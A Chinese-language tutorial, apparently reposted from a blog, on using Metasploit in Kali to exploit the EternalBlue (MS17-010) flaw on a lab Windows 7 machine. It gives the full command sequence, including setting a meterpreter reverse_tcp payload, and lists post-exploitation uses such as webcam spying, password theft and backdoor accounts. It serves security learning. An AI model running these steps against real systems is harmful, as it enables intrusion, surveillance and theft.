目录
<一>:metasploit 简述
<二>:msf 使用法则
<三>:启动 metasploit 前需要做的事项
<四>:metasploit 攻击 windows 系统
metasploit 攻击 eternalblue(永恒之蓝)全流程:
(1):使用模块
(2):配置模块必选项
(3):运行模块
(4):设置必选项(补充)
<五>:meterpreter 攻击成功后能做什么
<一>:metasploit 简述
metasploit 简称 msf,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的 shellcode,并持续保持更新。
<二>:msf 使用法则
使用模块 ->配置模块必选项->运行模块
<三>:启动 metasploit 前需要做的事项
①:打开Kali终端
②:使用sudo su 命令,并输入 Kali 的密码,切换至root用户
③:使用 msfdb init 命令初始化 metasploit 数据库(*可选)
<四>:metasploit 攻击 windows 系统
msfconsole:启动 metasploit 命令行 (命令行效率高,方便使用)
metasploit 攻击 eternalblue(永恒之蓝)全流程:
(1):使用模块
①:搜索微软给永恒之蓝的漏洞号:search ms17_010
②: 使用此漏洞:use exploit/windows/smb/ms17_010_eternalblue
(2):配置模块必选项
查看必选项[*required 为 yes 的就是必选项]
①:show options (查看设置)
(3):运行模块
以虚拟机上的xin7操作系统为靶机为例 (先同时按win+R,然后输入cmd,回车,最后输入ipconfig,查看被攻击的靶机IP地址)
①:set RHosts 被攻击的IP地址
②:show options (查看是否还有必选项需要修改)
③:set LPORT 0~65536 (为了防止攻击失败多设置一个)
④:run (攻击操作系统,并获取命令运行最低权限)
(注:显示攻击失败表示目标主机上没有此漏洞,此漏洞只适用于攻击自己的win7靶机,高版本的系统已经修复此漏洞,显示WIN 表示攻击成功,其他则是失败)
(4):设置必选项(补充)
①: set RHosts 被攻击的IP地址
[*RHOSTS 为 target host(s)代表要攻击谁]
②: set Payload windows/x64/meterpreter/reverse_tcp
[*Payload 是攻击载荷,就是攻击完成后想获取的东西,这里是想获取 meterpreter]
[*meterpreter 是metasploit 后渗透的神器 ]
③:set LHOST 攻击的IP地址
[*LHOST 为 listen host 代表你是谁]
④:set LPORT 攻击方使用的监听端口
[* LPORT 为 listen port 代表要在攻击方上开启的端口,1~65535随便选,但不能被占用]
(5):meterpreter 后输入 help,可显示攻击成功后可用的权限
<五>:meterpreter 攻击成功后能做什么
meterpreter 是强大的后渗透模块,可以输入help 查看帮助信息,远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统.......这些看起来非常复杂又高级的操作都能用meterpreter 中的一行或几个字母,简单的命令完成。文章来源:https://www.toymoban.com/news/detail-477117.html
(注:此文章及操作流程只限于学习交流,请勿进行非法操作,做遵纪守法公民)文章来源地址https://www.toymoban.com/news/detail-477117.html
到了这里,关于在Kali操作系统上使用metasploit的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!